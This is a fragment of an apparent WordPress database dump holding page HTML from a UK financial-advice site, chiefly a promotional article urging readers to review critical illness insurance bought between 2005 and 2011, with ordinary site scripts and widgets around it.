Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">How Annuities Have Changed Since The Budget</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">How Annuities Have Changed Since The Budget</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						<ul><li><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n					      </li>&#13;\n					  </ul></li>&#13;\n					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;	How Annuities Have Changed Since The Budget','This article looks at the changes to annuities and how they will affect you, so the first thing to do is to explain specifically how they have changed.','publish','closed','closed','','how-annuities-have-changed-since-the-budget','','','2017-09-21 17:35:59','2017-09-21 17:35:59','',0,'http://www.equalitywalk.org.uk/how-annuities-have-changed-since-the-budget',0,'post','',0),(42,1,'2017-09-21 16:34:25','2017-09-21 16:34:25','<body class=\"single single-post postid-7394 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"/></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										5 Powerful Reasons To Review Your Critical illness Insurance										</h1>&#13;\n				</div>&#13;\n</div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-7394\" class=\"post-7394 post type-post status-publish format-standard has-post-thumbnail hentry category-insurance-protection post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">5 Powerful Reasons To Review Your Critical illness Insurance</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h5/>&#13;\n<h5/>&#13;\n<p>Fast Facts</p>&#13;\n<p>There is a <b>pressing need to for anyone</b> who has bought critical illness insurance from a <b><span style=\"text-decoration: underline;\">Bank, online or even with their financial adviser</span> </b>between<b> 2005 and 2011,</b>who has not had it reviewed recently to get it reviewed now</p>&#13;\n<p>#1: Heart Attacks<br/>&#13;\nImproved so you can claim on  minor heart attacks</p>&#13;\n<p><span style=\"line-height: 1.5em;\">#2: Strokes</span><br/><span style=\"line-height: 1.5em;\">Reduced the need for “</span>permanency<span style=\"line-height: 1.5em;\">” meaning quicker &amp; more claims paid</span></p>&#13;\n<p>#3: Cancer<br/>&#13;\nCovering more early stage cancer – which can only be good news for claimants</p>&#13;\n<p><span style=\"line-height: 1.5em;\"> #4: Partial Payments</span><br/><span style=\"line-height: 1.5em;\">Significant </span>improvements<span style=\"line-height: 1.5em;\"> being made on cover for the less serious illnesses</span><span style=\"line-height: 1.5em;\"> </span></p>&#13;\n<p> #5: 21st Century Comparison Report<br/>&#13;\nQuick and easy compare to find the best plan for you</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1><b>5 POWERFUL REASONS TO REVIEW YOUR CRITICAL ILLNESS INSURANCE</b></h1>&#13;\n<p><span style=\"font-size: 1.17em; line-height: 1.5em;\">By : Strategic Development Director</span></p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<p><b>Do you spend any time on the small print on your critical illness insurance cover?  In fact most people will take a quick look at the conditions and assume they are fully covered, before putting it away in a drawer.</b></p>&#13;\n<p>You might think that with critical illness cover the insurance company’s description of “critical” would always tally with the client’s definition.</p>&#13;\n<p>However that may not always the case, when it comes to meeting the plan wording at time of a claim.</p>&#13;\n<p>Let me explain…</p>&#13;\n<p><span style=\"font-size: 14px; line-height: 1.5em;\"> </span></p>&#13;\n<p>Why Does Critical Illness Insurance Need to Change</p>&#13;\n<p><span style=\"line-height: 1.5em;\">The world is a different place to what it once was, and it is changing day by day for all of us. Improvements in healthcare, diet and living conditions mean </span><b style=\"line-height: 1.5em;\">we are now living longer than ever before.</b></p>&#13;\n<p>Medical technology is advancing all the time. Tests and screenings are now much better at identifying less severe conditions. For example, doctors are now <b>able to detect less</b> severe heart attacks.</p>&#13;\n<p>At the same time, people are more aware of the risks to their health, <b>so they are going for screenings sooner</b>. This means certain conditions, such as cancer, are now being <b>diagnosed much earlier</b>, sometimes even before symptoms develop.</p>&#13;\n<p>So surely that’s a good thing, right? In the main – yes it is! It means we’re around longer to see our families grow and flourish, to make the most of life and to enjoy all that it has to offer.</p>&#13;\n<p>But it’s much more complex than that. By living longer, it means our lives are<b> no longer black </b><b>and white.</b> New complications are emerging. The 21st Century may bring new benefits, but it also brings new problems.</p>&#13;\n<p>That’s why some of the forms of critical illness covers drawn together in the 20th Century are no longer relevant to life today.</p>&#13;\n<p><b style=\"line-height: 1.5em;\">So what changed with CI Cover in 2017</b></p>&#13;\n<p/>&#13;\n<p>Last year was a year of tremendous change due to some insurers making improvements to the depth and breadth of their CI cover, making claiming on a plan much easier, which can only be good news for new consumers…</p>&#13;\n<p>… but what if you already have a plan?</p>&#13;\n<p>*It is estimated that of the 5 million critical illness plans in existence today over 50% plans can be upgraded to better levels of protection, with those who took out plans between 2005 and 2011 gaining most.</p>&#13;\n<p>Subject to cost and underwriting, this certainly corresponds to our own client reviews, which means:</p>&#13;\n<ul><li><span style=\"line-height: 1.5em;\">quicker and faster pay outs at time of claim.</span></li>&#13;\n<li>broader coverage so you can claim on more illnesses.</li>&#13;\n<li>less stress and hassle for claimants and their families.</li>&#13;\n</ul><p>That’s why there is a pressing need to for anyone who has bought critical illness insurance from a <span style=\"text-decoration: underline;\">Bank, online or even with their financial adviser</span> who has not had it reviewed in the few years to get it reviewed as soon as possible.</p>&#13;\n<h2 style=\"text-align: left;\"><span style=\"color: #993300;\"><b>Here’s my 5 powerful reasons to review your critical illness insurance in the hope that you don’t discover that the small print excludes your illness – because it is not serious enough.</b></span></h2>&#13;\n<p><span style=\"line-height: 1.5em;\"><div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #1: Less Severe Heart Attacks Now Covered </span><span style=\"line-height: 1.5em;\"/></div></div></span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">There are around 103,000 heart attacks each year in the UK. Incidence increases markedly with age with:</span></p>&#13;\n<ul><li>men in the 25-44 age group suffering 300 per million and</li>&#13;\n<li>men in the 45-64 group 5,300 per million.</li>&#13;\n<li>men under age 50 are over four times more likely to suffer a heart attack than women.</li>&#13;\n</ul><p>Whats changed</p>&#13;\n<p>A number of insurers improved their policy definitions to make it easier for people to make a claim for a heart attack.</p>&#13;\n<p>Some have <b><span style=\"text-decoration: underline;\">removed the need</span></b> for troponin to reach a specific raised level for a claim to be successfully paid, and instead simply requiring enzyme levels to be raised for a paid claim, Some <b>even removed the need to rely on</b> enzyme levels altogether.</p>&#13;\n<p>Which means with some insurers you are 45% more likely to get a pay-out?</p>&#13;\n<p><span style=\"font-size: 1.17em; line-height: 1.5em;\"><div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #2: New Plan Wording Will Help With Quicker Payments and Fewer Declines</span><span style=\"font-size: 1.17em; line-height: 1.5em;\"/></div></div></span></p>&#13;\n<div>&#13;\n<p>Each year of the 150,000 strokes in the UK about 110,000 suffer a first stroke, did you also know that:.</p>&#13;\n<ul><li>12,500 first stoke victims were under age 65.</li>&#13;\n<li>male to female ratio is 60:40.</li>&#13;\n<li><span style=\"line-height: 1.5em;\">between 20% &amp; 30% of sufferers will die within a month.</span></li>&#13;\n<li>the risk of a first stroke for smokers is 140% higher</li>&#13;\n<li>for Diabetes sufferers is 100% higher</li>&#13;\n</ul><p>Let’s go a bit deeper on the CI changes…</p>&#13;\n<p>Around <b>one in six stroke</b> sufferers will meet the <b>permanent neurological deficit requirement </b>required under the policy wording for a stroke.</p>&#13;\n<p>Stroke definitions were streamlined so that neurological damage <b>no longer needed to be permanent</b> in order to make a claim, instead taking into account symptoms extending beyond 24 hours with a positive brain scan.</p>&#13;\n<p>According to the Stroke Society a third of people who have a stroke make a significant recovery within a month. But most stroke survivors will have long-term problems. It may take a year or longer for them to make the best possible recovery.  – however a stroke does not always present permanent symptoms by removing the need for permanency…</p>&#13;\n<p>…we expect insurers to<b> pay even more claims</b>, with quicker payment and fewer declines.</p>&#13;\n</div>&#13;\n<p/><div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #3: Significant Cancer Cover Improvements</span></div></div>&#13;\n<p>Cancer is not a single disease with a single type of treatment. There are more than <b>200 different kinds of cancer</b>, each with its own name and treatment.</p>&#13;\n<p>According to CI Expert cancer is the single most feared disease with 320,000 new diagnoses in the UK during 2011, ignoring non-melanoma skin cancers. Of these, 117,000 affected those below age 65 and over 60% of these affected females.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">Unsurprisingly it is also the condition most likely to result in a claim and half of people diagnosed with cancer now survive their disease for at least five years.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">The main cancer definition has remained unchanged for many years but we have seen some insurers </span><b style=\"line-height: 1.5em;\">extend </b><span style=\"line-height: 1.5em;\">cover for:</span></p>&#13;\n<ul><li>chronic lymphocytic leukaemia</li>&#13;\n<li>skin cancer basal cell carcinoma</li>&#13;\n<li>squamous cell carcinoma</li>&#13;\n</ul><p><b>*Basal cell carcinoma</b> is a cancer of the basal cells, it accounts for <b>75% of all skin cancers</b> in the UK, while squamous cell carcinoma and accounts for about 20% according to evidence from National Institute for Health and Care Excellence (NICE).</p>&#13;\n<p>Early stage cancer – carcinoma in situ</p>&#13;\n<p>One insurer has updated its serious illness cover in relation to cancer payments. Typically insurers <b>only cover carcinoma in situ cancers</b>  with a partial payout– this is an early forms of cancer in specific parts of the body and <b>only</b> if the client has surgery or invasive treatment.</p>&#13;\n<p>The insurer moved to paying out a 5 per cent partial payment <b>on all forms of carcinoma in situ cancers regardless of where they are in the body</b>, and on some non-melanoma skin cancers.</p>&#13;\n<p>It also pays out <b>on diagnosis</b> of the <b>carcinoma in situ</b> cancer, rather than requiring evidence of treatment or surgery to make a claim.</p>&#13;\n<p>With cancer accounting for circa 65% of all insurer claims, again this can only be good news for claimants increasing what they can claim on.</p>&#13;\n<div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #4:  More Partial Payments for Serious Illness</span> </div></div>&#13;\n<p><span style=\"line-height: 1.5em;\">Over the last few years we have seen the inclusion of partial payment conditions into CI plans. from the introduction of  children’s critical illness to more recent inclusions of mastectomy due to ductal carcinoma in situ and early stage prostate cancer, both that add great value to a plan.</span></p>&#13;\n<p>Although the  main focus has been on two conditions ,we  are now seeing an increase into other areas with some traditional CI insurers now adding up to 17 early stage pay-outs for less serious illnesses, covering  conditions like – coronary angioplasty: crohn’s disease and severe visual impairment.</p>&#13;\n<p>Only one insurer offers a full severity based plan with up to 166 conditions covered – that’s over 100 more than any other insurer.</p>&#13;\n<p>Breaking the cover down for you even further. Recent changes to full severity Illness Insurance now covers:</p>&#13;\n<ul><li>All types of heart attacks and strokes – including those that other insurers don’t</li>&#13;\n<li>More forms of cancer than any other insurer.</li>&#13;\n<li>Early stage forms of cancer upon diagnosis only – again, this is something that other insurers simply won’t do.</li>&#13;\n</ul><div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #5: More Transparent Comparisons </span> </div></div>&#13;\n<p>Imagine if you could effortlessly compare all the competing critical illness cover plans in the market quickly and transparently without lifting a finger, so you get the plans with the highest statistical likely hood of paying out to you and your family with no:</p>&#13;\n<ul><li>personal judgement or bias</li>&#13;\n<li>insurer marketing hype</li>&#13;\n<li>sales pressure</li>&#13;\n</ul><p>Here is an example of our report when analysing a 2008  plan against one of the newer style plans – the first column shows that we lose no important conditions or plan wording and the second column all the areas that can be discussed and improved upon.</p>&#13;\n<p/>&#13;\n<p>Critical illness plans have evolved over the last few years. <b>How does your plan stack up – click the button below to see a sample full report</b></p>&#13;\n<p style=\"text-align: center;\"><a class=\"button-1 button large green\" title=\"\" href=\"http://www.reidscottross.co.uk/wp-content/uploads/2014/02/CI-Article-Comparison.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.reidscottross.co.uk/wp-content/uploads/2014/02/CI-Article-Comparison.pdf\']);\" target=\"_self\">View Sample Report</a></p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<p><span style=\"line-height: 1.5em; font-size: 14px;\">So as you can see, there’s a great deal of thought and effort that has gone into this to make sure that the client – the person that matters in all of this – comes first.</span></p>&#13;\n<p>I could have created a bigger list of improvements but kept to the ones that I feel have the biggest impact  and relevance to consumers. But it worth mentioning that improvements were made into areas like; children s CI cover; well-being support and claims ratios.</p>&#13;\n<p><b style=\"font-size: 14px; line-height: 1.5em;\">Next Steps</b></p>&#13;\n<p>Now I don’t know about you but arranging your critical illness insurance efficiently can make a significant difference to the scope and breadth of being able to make a successful claim and get the best value plan for your budget.</p>&#13;\n<p>I’m not going to say that I am the perfect person to arrange your critical illness insurance because that might be too pushy. What I will say is I am more than happy to provide you with a FREE comparison report so you see the difference for yourself.</p>&#13;\n<p>It couldn’t be simpler just click on the “Get Your Free Report” button to get started<span style=\"line-height: 1.5em;\"> and discover how our highly personalised approach to your family protection can make the difference you need.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Warmest regards</span></p>&#13;\n<p>Sam<br/>&#13;\nEquity SMART</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-right, left, top or bottom-width:3px !important;border-right, left, top or bottom-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.reidscottross.co.uk/contact-us/\" target=\"\" class=\"continue button large default\">Get Your Report Today</a><h2>Get Your FREE CI Comparison Report</h2><p>You can improve your position, starting today - click the link</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Get Your Report Today</a></section></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/insurance-protection/\" title=\"View all posts in Insurance Protection\" rel=\"category tag\">Insurance Protection</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../5-powerful-reasons-review-critical-illness-insurance/\" title=\"Comment on 5 Powerful Reasons To Review Your Critical illness Insurance\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a 